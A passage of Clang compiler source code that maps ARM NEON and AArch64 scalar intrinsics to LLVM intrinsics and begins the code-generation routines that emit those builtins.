NEONMAP1(vst1q_x2_v, aarch64_neon_st1x2, 0),
NEONMAP1(vst1q_x3_v, aarch64_neon_st1x3, 0),
NEONMAP1(vst1q_x4_v, aarch64_neon_st1x4, 0),
NEONMAP0(vsubhn_v),
NEONMAP0(vtst_v),
NEONMAP0(vtstq_v),
NEONMAP1(vusdot_v, aarch64_neon_usdot, 0),
NEONMAP1(vusdotq_v, aarch64_neon_usdot, 0),
NEONMAP1(vusmmlaq_v, aarch64_neon_usmmla, 0),
NEONMAP1(vxarq_v, aarch64_crypto_xar, 0),
};
static const ARMVectorIntrinsicInfo AArch64SISDIntrinsicMap[] = {
NEONMAP1(vabdd_f64, aarch64_sisd_fabd, Add1ArgType),
NEONMAP1(vabds_f32, aarch64_sisd_fabd, Add1ArgType),
NEONMAP1(vabsd_s64, aarch64_neon_abs, Add1ArgType),
NEONMAP1(vaddlv_s32, aarch64_neon_saddlv, AddRetType | Add1ArgType),
NEONMAP1(vaddlv_u32, aarch64_neon_uaddlv, AddRetType | Add1ArgType),
NEONMAP1(vaddlvq_s32, aarch64_neon_saddlv, AddRetType | Add1ArgType),
NEONMAP1(vaddlvq_u32, aarch64_neon_uaddlv, AddRetType | Add1ArgType),
NEONMAP1(vaddv_f32, aarch64_neon_faddv, AddRetType | Add1ArgType),
NEONMAP1(vaddv_s32, aarch64_neon_saddv, AddRetType | Add1ArgType),
NEONMAP1(vaddv_u32, aarch64_neon_uaddv, AddRetType | Add1ArgType),
NEONMAP1(vaddvq_f32, aarch64_neon_faddv, AddRetType | Add1ArgType),
NEONMAP1(vaddvq_f64, aarch64_neon_faddv, AddRetType | Add1ArgType),
NEONMAP1(vaddvq_s32, aarch64_neon_saddv, AddRetType | Add1ArgType),
NEONMAP1(vaddvq_s64, aarch64_neon_saddv, AddRetType | Add1ArgType),
NEONMAP1(vaddvq_u32, aarch64_neon_uaddv, AddRetType | Add1ArgType),
NEONMAP1(vaddvq_u64, aarch64_neon_uaddv, AddRetType | Add1ArgType),
NEONMAP1(vcaged_f64, aarch64_neon_facge, AddRetType | Add1ArgType),
NEONMAP1(vcages_f32, aarch64_neon_facge, AddRetType | Add1ArgType),
NEONMAP1(vcagtd_f64, aarch64_neon_facgt, AddRetType | Add1ArgType),
NEONMAP1(vcagts_f32, aarch64_neon_facgt, AddRetType | Add1ArgType),
NEONMAP1(vcaled_f64, aarch64_neon_facge, AddRetType | Add1ArgType),
NEONMAP1(vcales_f32, aarch64_neon_facge, AddRetType | Add1ArgType),
NEONMAP1(vcaltd_f64, aarch64_neon_facgt, AddRetType | Add1ArgType),
NEONMAP1(vcalts_f32, aarch64_neon_facgt, AddRetType | Add1ArgType),
NEONMAP1(vcvtad_s64_f64, aarch64_neon_fcvtas, AddRetType | Add1ArgType),
NEONMAP1(vcvtad_u64_f64, aarch64_neon_fcvtau, AddRetType | Add1ArgType),
NEONMAP1(vcvtas_s32_f32, aarch64_neon_fcvtas, AddRetType | Add1ArgType),
NEONMAP1(vcvtas_u32_f32, aarch64_neon_fcvtau, AddRetType | Add1ArgType),
NEONMAP1(vcvtd_n_f64_s64, aarch64_neon_vcvtfxs2fp, AddRetType | Add1ArgType),
NEONMAP1(vcvtd_n_f64_u64, aarch64_neon_vcvtfxu2fp, AddRetType | Add1ArgType),
NEONMAP1(vcvtd_n_s64_f64, aarch64_neon_vcvtfp2fxs, AddRetType | Add1ArgType),
NEONMAP1(vcvtd_n_u64_f64, aarch64_neon_vcvtfp2fxu, AddRetType | Add1ArgType),
NEONMAP1(vcvtd_s64_f64, aarch64_neon_fcvtzs, AddRetType | Add1ArgType),
NEONMAP1(vcvtd_u64_f64, aarch64_neon_fcvtzu, AddRetType | Add1ArgType),
NEONMAP1(vcvth_bf16_f32, aarch64_neon_bfcvt, 0),
NEONMAP1(vcvtmd_s64_f64, aarch64_neon_fcvtms, AddRetType | Add1ArgType),
NEONMAP1(vcvtmd_u64_f64, aarch64_neon_fcvtmu, AddRetType | Add1ArgType),
NEONMAP1(vcvtms_s32_f32, aarch64_neon_fcvtms, AddRetType | Add1ArgType),
NEONMAP1(vcvtms_u32_f32, aarch64_neon_fcvtmu, AddRetType | Add1ArgType),
NEONMAP1(vcvtnd_s64_f64, aarch64_neon_fcvtns, AddRetType | Add1ArgType),
NEONMAP1(vcvtnd_u64_f64, aarch64_neon_fcvtnu, AddRetType | Add1ArgType),
NEONMAP1(vcvtns_s32_f32, aarch64_neon_fcvtns, AddRetType | Add1ArgType),
NEONMAP1(vcvtns_u32_f32, aarch64_neon_fcvtnu, AddRetType | Add1ArgType),
NEONMAP1(vcvtpd_s64_f64, aarch64_neon_fcvtps, AddRetType | Add1ArgType),
NEONMAP1(vcvtpd_u64_f64, aarch64_neon_fcvtpu, AddRetType | Add1ArgType),
NEONMAP1(vcvtps_s32_f32, aarch64_neon_fcvtps, AddRetType | Add1ArgType),
NEONMAP1(vcvtps_u32_f32, aarch64_neon_fcvtpu, AddRetType | Add1ArgType),
NEONMAP1(vcvts_n_f32_s32, aarch64_neon_vcvtfxs2fp, AddRetType | Add1ArgType),
NEONMAP1(vcvts_n_f32_u32, aarch64_neon_vcvtfxu2fp, AddRetType | Add1ArgType),
NEONMAP1(vcvts_n_s32_f32, aarch64_neon_vcvtfp2fxs, AddRetType | Add1ArgType),
NEONMAP1(vcvts_n_u32_f32, aarch64_neon_vcvtfp2fxu, AddRetType | Add1ArgType),
NEONMAP1(vcvts_s32_f32, aarch64_neon_fcvtzs, AddRetType | Add1ArgType),
NEONMAP1(vcvts_u32_f32, aarch64_neon_fcvtzu, AddRetType | Add1ArgType),
NEONMAP1(vcvtxd_f32_f64, aarch64_sisd_fcvtxn, 0),
NEONMAP1(vmaxnmv_f32, aarch64_neon_fmaxnmv, AddRetType | Add1ArgType),
NEONMAP1(vmaxnmvq_f32, aarch64_neon_fmaxnmv, AddRetType | Add1ArgType),
NEONMAP1(vmaxnmvq_f64, aarch64_neon_fmaxnmv, AddRetType | Add1ArgType),
NEONMAP1(vmaxv_f32, aarch64_neon_fmaxv, AddRetType | Add1ArgType),
NEONMAP1(vmaxv_s32, aarch64_neon_smaxv, AddRetType | Add1ArgType),
NEONMAP1(vmaxv_u32, aarch64_neon_umaxv, AddRetType | Add1ArgType),
NEONMAP1(vmaxvq_f32, aarch64_neon_fmaxv, AddRetType | Add1ArgType),
NEONMAP1(vmaxvq_f64, aarch64_neon_fmaxv, AddRetType | Add1ArgType),
NEONMAP1(vmaxvq_s32, aarch64_neon_smaxv, AddRetType | Add1ArgType),
NEONMAP1(vmaxvq_u32, aarch64_neon_umaxv, AddRetType | Add1ArgType),
NEONMAP1(vminnmv_f32, aarch64_neon_fminnmv, AddRetType | Add1ArgType),
NEONMAP1(vminnmvq_f32, aarch64_neon_fminnmv, AddRetType | Add1ArgType),
NEONMAP1(vminnmvq_f64, aarch64_neon_fminnmv, AddRetType | Add1ArgType),
NEONMAP1(vminv_f32, aarch64_neon_fminv, AddRetType | Add1ArgType),
NEONMAP1(vminv_s32, aarch64_neon_sminv, AddRetType | Add1ArgType),
NEONMAP1(vminv_u32, aarch64_neon_uminv, AddRetType | Add1ArgType),
NEONMAP1(vminvq_f32, aarch64_neon_fminv, AddRetType | Add1ArgType),
NEONMAP1(vminvq_f64, aarch64_neon_fminv, AddRetType | Add1ArgType),
NEONMAP1(vminvq_s32, aarch64_neon_sminv, AddRetType | Add1ArgType),
NEONMAP1(vminvq_u32, aarch64_neon_uminv, AddRetType | Add1ArgType),
NEONMAP1(vmull_p64, aarch64_neon_pmull64, 0),
NEONMAP1(vmulxd_f64, aarch64_neon_fmulx, Add1ArgType),
NEONMAP1(vmulxs_f32, aarch64_neon_fmulx, Add1ArgType),
NEONMAP1(vpaddd_s64, aarch64_neon_uaddv, AddRetType | Add1ArgType),
NEONMAP1(vpaddd_u64, aarch64_neon_uaddv, AddRetType | Add1ArgType),
NEONMAP1(vpmaxnmqd_f64, aarch64_neon_fmaxnmv, AddRetType | Add1ArgType),
NEONMAP1(vpmaxnms_f32, aarch64_neon_fmaxnmv, AddRetType | Add1ArgType),
NEONMAP1(vpmaxqd_f64, aarch64_neon_fmaxv, AddRetType | Add1ArgType),
NEONMAP1(vpmaxs_f32, aarch64_neon_fmaxv, AddRetType | Add1ArgType),
NEONMAP1(vpminnmqd_f64, aarch64_neon_fminnmv, AddRetType | Add1ArgType),
NEONMAP1(vpminnms_f32, aarch64_neon_fminnmv, AddRetType | Add1ArgType),
NEONMAP1(vpminqd_f64, aarch64_neon_fminv, AddRetType | Add1ArgType),
NEONMAP1(vpmins_f32, aarch64_neon_fminv, AddRetType | Add1ArgType),
NEONMAP1(vqabsb_s8, aarch64_neon_sqabs, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqabsd_s64, aarch64_neon_sqabs, Add1ArgType),
NEONMAP1(vqabsh_s16, aarch64_neon_sqabs, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqabss_s32, aarch64_neon_sqabs, Add1ArgType),
NEONMAP1(vqaddb_s8, aarch64_neon_sqadd, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqaddb_u8, aarch64_neon_uqadd, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqaddd_s64, aarch64_neon_sqadd, Add1ArgType),
NEONMAP1(vqaddd_u64, aarch64_neon_uqadd, Add1ArgType),
NEONMAP1(vqaddh_s16, aarch64_neon_sqadd, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqaddh_u16, aarch64_neon_uqadd, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqadds_s32, aarch64_neon_sqadd, Add1ArgType),
NEONMAP1(vqadds_u32, aarch64_neon_uqadd, Add1ArgType),
NEONMAP1(vqdmulhh_s16, aarch64_neon_sqdmulh, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqdmulhs_s32, aarch64_neon_sqdmulh, Add1ArgType),
NEONMAP1(vqdmullh_s16, aarch64_neon_sqdmull, VectorRet | Use128BitVectors),
NEONMAP1(vqdmulls_s32, aarch64_neon_sqdmulls_scalar, 0),
NEONMAP1(vqmovnd_s64, aarch64_neon_scalar_sqxtn, AddRetType | Add1ArgType),
NEONMAP1(vqmovnd_u64, aarch64_neon_scalar_uqxtn, AddRetType | Add1ArgType),
NEONMAP1(vqmovnh_s16, aarch64_neon_sqxtn, VectorRet | Use64BitVectors),
NEONMAP1(vqmovnh_u16, aarch64_neon_uqxtn, VectorRet | Use64BitVectors),
NEONMAP1(vqmovns_s32, aarch64_neon_sqxtn, VectorRet | Use64BitVectors),
NEONMAP1(vqmovns_u32, aarch64_neon_uqxtn, VectorRet | Use64BitVectors),
NEONMAP1(vqmovund_s64, aarch64_neon_scalar_sqxtun, AddRetType | Add1ArgType),
NEONMAP1(vqmovunh_s16, aarch64_neon_sqxtun, VectorRet | Use64BitVectors),
NEONMAP1(vqmovuns_s32, aarch64_neon_sqxtun, VectorRet | Use64BitVectors),
NEONMAP1(vqnegb_s8, aarch64_neon_sqneg, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqnegd_s64, aarch64_neon_sqneg, Add1ArgType),
NEONMAP1(vqnegh_s16, aarch64_neon_sqneg, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqnegs_s32, aarch64_neon_sqneg, Add1ArgType),
NEONMAP1(vqrdmulhh_s16, aarch64_neon_sqrdmulh, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqrdmulhs_s32, aarch64_neon_sqrdmulh, Add1ArgType),
NEONMAP1(vqrshlb_s8, aarch64_neon_sqrshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqrshlb_u8, aarch64_neon_uqrshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqrshld_s64, aarch64_neon_sqrshl, Add1ArgType),
NEONMAP1(vqrshld_u64, aarch64_neon_uqrshl, Add1ArgType),
NEONMAP1(vqrshlh_s16, aarch64_neon_sqrshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqrshlh_u16, aarch64_neon_uqrshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqrshls_s32, aarch64_neon_sqrshl, Add1ArgType),
NEONMAP1(vqrshls_u32, aarch64_neon_uqrshl, Add1ArgType),
NEONMAP1(vqrshrnd_n_s64, aarch64_neon_sqrshrn, AddRetType),
NEONMAP1(vqrshrnd_n_u64, aarch64_neon_uqrshrn, AddRetType),
NEONMAP1(vqrshrnh_n_s16, aarch64_neon_sqrshrn, VectorRet | Use64BitVectors),
NEONMAP1(vqrshrnh_n_u16, aarch64_neon_uqrshrn, VectorRet | Use64BitVectors),
NEONMAP1(vqrshrns_n_s32, aarch64_neon_sqrshrn, VectorRet | Use64BitVectors),
NEONMAP1(vqrshrns_n_u32, aarch64_neon_uqrshrn, VectorRet | Use64BitVectors),
NEONMAP1(vqrshrund_n_s64, aarch64_neon_sqrshrun, AddRetType),
NEONMAP1(vqrshrunh_n_s16, aarch64_neon_sqrshrun, VectorRet | Use64BitVectors),
NEONMAP1(vqrshruns_n_s32, aarch64_neon_sqrshrun, VectorRet | Use64BitVectors),
NEONMAP1(vqshlb_n_s8, aarch64_neon_sqshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshlb_n_u8, aarch64_neon_uqshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshlb_s8, aarch64_neon_sqshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshlb_u8, aarch64_neon_uqshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshld_s64, aarch64_neon_sqshl, Add1ArgType),
NEONMAP1(vqshld_u64, aarch64_neon_uqshl, Add1ArgType),
NEONMAP1(vqshlh_n_s16, aarch64_neon_sqshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshlh_n_u16, aarch64_neon_uqshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshlh_s16, aarch64_neon_sqshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshlh_u16, aarch64_neon_uqshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshls_n_s32, aarch64_neon_sqshl, Add1ArgType),
NEONMAP1(vqshls_n_u32, aarch64_neon_uqshl, Add1ArgType),
NEONMAP1(vqshls_s32, aarch64_neon_sqshl, Add1ArgType),
NEONMAP1(vqshls_u32, aarch64_neon_uqshl, Add1ArgType),
NEONMAP1(vqshlub_n_s8, aarch64_neon_sqshlu, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshluh_n_s16, aarch64_neon_sqshlu, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshlus_n_s32, aarch64_neon_sqshlu, Add1ArgType),
NEONMAP1(vqshrnd_n_s64, aarch64_neon_sqshrn, AddRetType),
NEONMAP1(vqshrnd_n_u64, aarch64_neon_uqshrn, AddRetType),
NEONMAP1(vqshrnh_n_s16, aarch64_neon_sqshrn, VectorRet | Use64BitVectors),
NEONMAP1(vqshrnh_n_u16, aarch64_neon_uqshrn, VectorRet | Use64BitVectors),
NEONMAP1(vqshrns_n_s32, aarch64_neon_sqshrn, VectorRet | Use64BitVectors),
NEONMAP1(vqshrns_n_u32, aarch64_neon_uqshrn, VectorRet | Use64BitVectors),
NEONMAP1(vqshrund_n_s64, aarch64_neon_sqshrun, AddRetType),
NEONMAP1(vqshrunh_n_s16, aarch64_neon_sqshrun, VectorRet | Use64BitVectors),
NEONMAP1(vqshruns_n_s32, aarch64_neon_sqshrun, VectorRet | Use64BitVectors),
NEONMAP1(vqsubb_s8, aarch64_neon_sqsub, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqsubb_u8, aarch64_neon_uqsub, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqsubd_s64, aarch64_neon_sqsub, Add1ArgType),
NEONMAP1(vqsubd_u64, aarch64_neon_uqsub, Add1ArgType),
NEONMAP1(vqsubh_s16, aarch64_neon_sqsub, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqsubh_u16, aarch64_neon_uqsub, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqsubs_s32, aarch64_neon_sqsub, Add1ArgType),
NEONMAP1(vqsubs_u32, aarch64_neon_uqsub, Add1ArgType),
NEONMAP1(vrecped_f64, aarch64_neon_frecpe, Add1ArgType),
NEONMAP1(vrecpes_f32, aarch64_neon_frecpe, Add1ArgType),
NEONMAP1(vrecpxd_f64, aarch64_neon_frecpx, Add1ArgType),
NEONMAP1(vrecpxs_f32, aarch64_neon_frecpx, Add1ArgType),
NEONMAP1(vrshld_s64, aarch64_neon_srshl, Add1ArgType),
NEONMAP1(vrshld_u64, aarch64_neon_urshl, Add1ArgType),
NEONMAP1(vrsqrted_f64, aarch64_neon_frsqrte, Add1ArgType),
NEONMAP1(vrsqrtes_f32, aarch64_neon_frsqrte, Add1ArgType),
NEONMAP1(vrsqrtsd_f64, aarch64_neon_frsqrts, Add1ArgType),
NEONMAP1(vrsqrtss_f32, aarch64_neon_frsqrts, Add1ArgType),
NEONMAP1(vsha1cq_u32, aarch64_crypto_sha1c, 0),
NEONMAP1(vsha1h_u32, aarch64_crypto_sha1h, 0),
NEONMAP1(vsha1mq_u32, aarch64_crypto_sha1m, 0),
NEONMAP1(vsha1pq_u32, aarch64_crypto_sha1p, 0),
NEONMAP1(vshld_s64, aarch64_neon_sshl, Add1ArgType),
NEONMAP1(vshld_u64, aarch64_neon_ushl, Add1ArgType),
NEONMAP1(vslid_n_s64, aarch64_neon_vsli, Vectorize1ArgType),
NEONMAP1(vslid_n_u64, aarch64_neon_vsli, Vectorize1ArgType),
NEONMAP1(vsqaddb_u8, aarch64_neon_usqadd, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vsqaddd_u64, aarch64_neon_usqadd, Add1ArgType),
NEONMAP1(vsqaddh_u16, aarch64_neon_usqadd, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vsqadds_u32, aarch64_neon_usqadd, Add1ArgType),
NEONMAP1(vsrid_n_s64, aarch64_neon_vsri, Vectorize1ArgType),
NEONMAP1(vsrid_n_u64, aarch64_neon_vsri, Vectorize1ArgType),
NEONMAP1(vuqaddb_s8, aarch64_neon_suqadd, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vuqaddd_s64, aarch64_neon_suqadd, Add1ArgType),
NEONMAP1(vuqaddh_s16, aarch64_neon_suqadd, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vuqadds_s32, aarch64_neon_suqadd, Add1ArgType),
// FP16 scalar intrinisics go here.
NEONMAP1(vabdh_f16, aarch64_sisd_fabd, Add1ArgType),
NEONMAP1(vcvtah_s32_f16, aarch64_neon_fcvtas, AddRetType | Add1ArgType),
NEONMAP1(vcvtah_s64_f16, aarch64_neon_fcvtas, AddRetType | Add1ArgType),
NEONMAP1(vcvtah_u32_f16, aarch64_neon_fcvtau, AddRetType | Add1ArgType),
NEONMAP1(vcvtah_u64_f16, aarch64_neon_fcvtau, AddRetType | Add1ArgType),
NEONMAP1(vcvth_n_f16_s32, aarch64_neon_vcvtfxs2fp, AddRetType | Add1ArgType),
NEONMAP1(vcvth_n_f16_s64, aarch64_neon_vcvtfxs2fp, AddRetType | Add1ArgType),
NEONMAP1(vcvth_n_f16_u32, aarch64_neon_vcvtfxu2fp, AddRetType | Add1ArgType),
NEONMAP1(vcvth_n_f16_u64, aarch64_neon_vcvtfxu2fp, AddRetType | Add1ArgType),
NEONMAP1(vcvth_n_s32_f16, aarch64_neon_vcvtfp2fxs, AddRetType | Add1ArgType),
NEONMAP1(vcvth_n_s64_f16, aarch64_neon_vcvtfp2fxs, AddRetType | Add1ArgType),
NEONMAP1(vcvth_n_u32_f16, aarch64_neon_vcvtfp2fxu, AddRetType | Add1ArgType),
NEONMAP1(vcvth_n_u64_f16, aarch64_neon_vcvtfp2fxu, AddRetType | Add1ArgType),
NEONMAP1(vcvth_s32_f16, aarch64_neon_fcvtzs, AddRetType | Add1ArgType),
NEONMAP1(vcvth_s64_f16, aarch64_neon_fcvtzs, AddRetType | Add1ArgType),
NEONMAP1(vcvth_u32_f16, aarch64_neon_fcvtzu, AddRetType | Add1ArgType),
NEONMAP1(vcvth_u64_f16, aarch64_neon_fcvtzu, AddRetType | Add1ArgType),
NEONMAP1(vcvtmh_s32_f16, aarch64_neon_fcvtms, AddRetType | Add1ArgType),
NEONMAP1(vcvtmh_s64_f16, aarch64_neon_fcvtms, AddRetType | Add1ArgType),
NEONMAP1(vcvtmh_u32_f16, aarch64_neon_fcvtmu, AddRetType | Add1ArgType),
NEONMAP1(vcvtmh_u64_f16, aarch64_neon_fcvtmu, AddRetType | Add1ArgType),
NEONMAP1(vcvtnh_s32_f16, aarch64_neon_fcvtns, AddRetType | Add1ArgType),
NEONMAP1(vcvtnh_s64_f16, aarch64_neon_fcvtns, AddRetType | Add1ArgType),
NEONMAP1(vcvtnh_u32_f16, aarch64_neon_fcvtnu, AddRetType | Add1ArgType),
NEONMAP1(vcvtnh_u64_f16, aarch64_neon_fcvtnu, AddRetType | Add1ArgType),
NEONMAP1(vcvtph_s32_f16, aarch64_neon_fcvtps, AddRetType | Add1ArgType),
NEONMAP1(vcvtph_s64_f16, aarch64_neon_fcvtps, AddRetType | Add1ArgType),
NEONMAP1(vcvtph_u32_f16, aarch64_neon_fcvtpu, AddRetType | Add1ArgType),
NEONMAP1(vcvtph_u64_f16, aarch64_neon_fcvtpu, AddRetType | Add1ArgType),
NEONMAP1(vmulxh_f16, aarch64_neon_fmulx, Add1ArgType),
NEONMAP1(vrecpeh_f16, aarch64_neon_frecpe, Add1ArgType),
NEONMAP1(vrecpxh_f16, aarch64_neon_frecpx, Add1ArgType),
NEONMAP1(vrsqrteh_f16, aarch64_neon_frsqrte, Add1ArgType),
NEONMAP1(vrsqrtsh_f16, aarch64_neon_frsqrts, Add1ArgType),
};
#undef NEONMAP0
#undef NEONMAP1
#undef NEONMAP2
#define SVEMAP1(NameBase, LLVMIntrinsic, TypeModifier) \
{ \
#NameBase, SVE::BI__builtin_sve_##NameBase, Intrinsic::LLVMIntrinsic, 0, \
TypeModifier \
}
#define SVEMAP2(NameBase, TypeModifier) \
{ #NameBase, SVE::BI__builtin_sve_##NameBase, 0, 0, TypeModifier }
static const ARMVectorIntrinsicInfo AArch64SVEIntrinsicMap[] = {
#define GET_SVE_LLVM_INTRINSIC_MAP
#include "clang/Basic/arm_sve_builtin_cg.inc"
#undef GET_SVE_LLVM_INTRINSIC_MAP
};
#undef SVEMAP1
#undef SVEMAP2
static bool NEONSIMDIntrinsicsProvenSorted = false;
static bool AArch64SIMDIntrinsicsProvenSorted = false;
static bool AArch64SISDIntrinsicsProvenSorted = false;
static bool AArch64SVEIntrinsicsProvenSorted = false;
static const ARMVectorIntrinsicInfo *
findARMVectorIntrinsicInMap(ArrayRef<ARMVectorIntrinsicInfo> IntrinsicMap,
unsigned BuiltinID, bool &MapProvenSorted) {
#ifndef NDEBUG
if (!MapProvenSorted) {
assert(llvm::is_sorted(IntrinsicMap));
MapProvenSorted = true;
}
#endif
const ARMVectorIntrinsicInfo *Builtin =
llvm::lower_bound(IntrinsicMap, BuiltinID);
if (Builtin != IntrinsicMap.end() && Builtin->BuiltinID == BuiltinID)
return Builtin;
return nullptr;
}
Function *CodeGenFunction::LookupNeonLLVMIntrinsic(unsigned IntrinsicID,
unsigned Modifier,
llvm::Type *ArgType,
const CallExpr *E) {
int VectorSize = 0;
if (Modifier & Use64BitVectors)
VectorSize = 64;
else if (Modifier & Use128BitVectors)
VectorSize = 128;
// Return type.
SmallVector<llvm::Type *, 3> Tys;
if (Modifier & AddRetType) {
llvm::Type *Ty = ConvertType(E->getCallReturnType(getContext()));
if (Modifier & VectorizeRetType)
Ty = llvm::FixedVectorType::get(
Ty, VectorSize ? VectorSize / Ty->getPrimitiveSizeInBits() : 1);
Tys.push_back(Ty);
}
// Arguments.
if (Modifier & VectorizeArgTypes) {
int Elts = VectorSize ? VectorSize / ArgType->getPrimitiveSizeInBits() : 1;
ArgType = llvm::FixedVectorType::get(ArgType, Elts);
}
if (Modifier & (Add1ArgType | Add2ArgTypes))
Tys.push_back(ArgType);
if (Modifier & Add2ArgTypes)
Tys.push_back(ArgType);
if (Modifier & InventFloatType)
Tys.push_back(FloatTy);
return CGM.getIntrinsic(IntrinsicID, Tys);
}
static Value *EmitCommonNeonSISDBuiltinExpr(
CodeGenFunction &CGF, const ARMVectorIntrinsicInfo &SISDInfo,
SmallVectorImpl<Value *> &Ops, const CallExpr *E) {
unsigned BuiltinID = SISDInfo.BuiltinID;
unsigned int Int = SISDInfo.LLVMIntrinsic;
unsigned Modifier = SISDInfo.TypeModifier;
const char *s = SISDInfo.NameHint;
switch (BuiltinID) {
case NEON::BI__builtin_neon_vcled_s64:
case NEON::BI__builtin_neon_vcled_u64:
case NEON::BI__builtin_neon_vcles_f32:
case NEON::BI__builtin_neon_vcled_f64:
case NEON::BI__builtin_neon_vcltd_s64:
case NEON::BI__builtin_neon_vcltd_u64:
case NEON::BI__builtin_neon_vclts_f32:
case NEON::BI__builtin_neon_vcltd_f64:
case NEON::BI__builtin_neon_vcales_f32:
case NEON::BI__builtin_neon_vcaled_f64:
case NEON::BI__builtin_neon_vcalts_f32:
case NEON::BI__builtin_neon_vcaltd_f64:
// Only one direction of comparisons actually exist, cmle is actually a cmge
// with swapped operands. The table gives us the right intrinsic but we
// still need to do the swap.
std::swap(Ops[0], Ops[1]);
break;
}
assert(Int && "Generic code assumes a valid intrinsic");
// Determine the type(s) of this overloaded AArch64 intrinsic.
const Expr *Arg = E->getArg(0);
llvm::Type *ArgTy = CGF.ConvertType(Arg->getType());
Function *F = CGF.LookupNeonLLVMIntrinsic(Int, Modifier, ArgTy, E);
int j = 0;
ConstantInt *C0 = ConstantInt::get(CGF.SizeTy, 0);
for (Function::const_arg_iterator ai = F->arg_begin(), ae = F->arg_end();
ai != ae; ++ai, ++j) {
llvm::Type *ArgTy = ai->getType();
if (Ops[j]->getType()->getPrimitiveSizeInBits() ==
ArgTy->getPrimitiveSizeInBits())
continue;
assert(ArgTy->isVectorTy() && !Ops[j]->getType()->isVectorTy());
// The constant argument to an _n_ intrinsic always has Int32Ty, so truncate
// it before inserting.
Ops[j] = CGF.Builder.CreateTruncOrBitCast(
Ops[j], cast<llvm::VectorType>(ArgTy)->getElementType());
Ops[j] =
CGF.Builder.CreateInsertElement(UndefValue::get(ArgTy), Ops[j], C0);
}
Value *Result = CGF.EmitNeonCall(F, Ops, s);
llvm::Type *ResultType = CGF.ConvertType(E->getType());
if (ResultType->getPrimitiveSizeInBits().getFixedSize() <
Result->getType()->getPrimitiveSizeInBits().getFixedSize())
return CGF.Builder.CreateExtractElement(Result, C0);
return CGF.Builder.CreateBitCast(Result, ResultType, s);
}
Value *CodeGenFunction::EmitCommonNeonBuiltinExpr(
unsigned BuiltinID, unsigned LLVMIntrinsic, unsigned AltLLVMIntrinsic,
const char *NameHint, unsigned Modifier, const CallExpr *E,
SmallVectorImpl<llvm::Value *> &Ops, Address PtrOp0, Address PtrOp1,
llvm::Triple::ArchType Arch) {
// Get the last argument, which specifies the vector type.
const Expr *Arg = E->getArg(E->getNumArgs() - 1);
Optional<llvm::APSInt> NeonTypeConst =
Arg->getIntegerConstantExpr(getContext());
if (!NeonTypeConst)
return nullptr;
// Determine the type of this overloaded NEON intrinsic.
NeonTypeFlags Type(NeonTypeConst->getZExtValue());
bool Usgn = Type.isUnsigned();
bool Quad = Type.isQuad();
const bool HasLegalHalfType = getTarget().hasLegalHalfType();
const bool AllowBFloatArgsAndRet =
getTargetHooks().getABIInfo().allowBFloatArgsAndRet();
llvm::FixedVectorType *VTy =
GetNeonType(this, Type, HasLegalHalfType, false, AllowBFloatArgsAndRet);
llvm::Type *Ty = VTy;
if (!Ty)
return nullptr;
auto getAlignmentValue32 = [&](Address addr) -> Value* {
return Builder.getInt32(addr.getAlignment().getQuantity());
};
unsigned Int = LLVMIntrinsic;
if ((Modifier & UnsignedAlts) && !Usgn)
Int = AltLLVMIntrinsic;
switch (BuiltinID) {
default: break;
case NEON::BI__builtin_neon_splat_lane_v:
case NEON::BI__builtin_neon_splat_laneq_v:
case NEON::BI__builtin_neon_splatq_lane_v:
case NEON::BI__builtin_neon_splatq_laneq_v: {
auto NumElements = VTy->getElementCount();
if (BuiltinID == NEON::BI__builtin_neon_splatq_lane_v)
NumElements = NumElements * 2;
if (BuiltinID == NEON::BI__builtin_neon_splat_laneq_v)
NumElements = NumElements.divideCoefficientBy(2);
Ops[0] = Builder.CreateBitCast(Ops[0], VTy);
return EmitNeonSplat(Ops[0], cast<ConstantInt>(Ops[1]), NumElements);
}
case NEON::BI__builtin_neon_vpadd_v:
case NEON::BI__builtin_neon_vpaddq_v:
// We don't allow fp/int overloading of intrinsics.
if (VTy->getElementType()->isFloatingPointTy() &&
Int == Intrinsic::aarch64_neon_addp)
Int = Intrinsic::aarch64_neon_faddp;
break;
case NEON::BI__builtin_neon_vabs_v:
case NEON::BI__builtin_neon_vabsq_v:
if (VTy->getElementType()->isFloatingPointTy())
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::fabs, Ty), Ops, "vabs");
return EmitNeonCall(CGM.getIntrinsic(LLVMIntrinsic, Ty), Ops, "vabs");
case NEON::BI__builtin_neon_vadd_v:
case NEON::BI__builtin_neon_vaddq_v: {
llvm::Type *VTy = llvm::FixedVectorType::get(Int8Ty, Quad ? 16 : 8);
Ops[0] = Builder.CreateBitCast(Ops[0], VTy);
Ops[1] = Builder.CreateBitCast(Ops[1], VTy);
Ops[0] = Builder.CreateXor(Ops[0], Ops[1]);
return Builder.CreateBitCast(Ops[0], Ty);
}
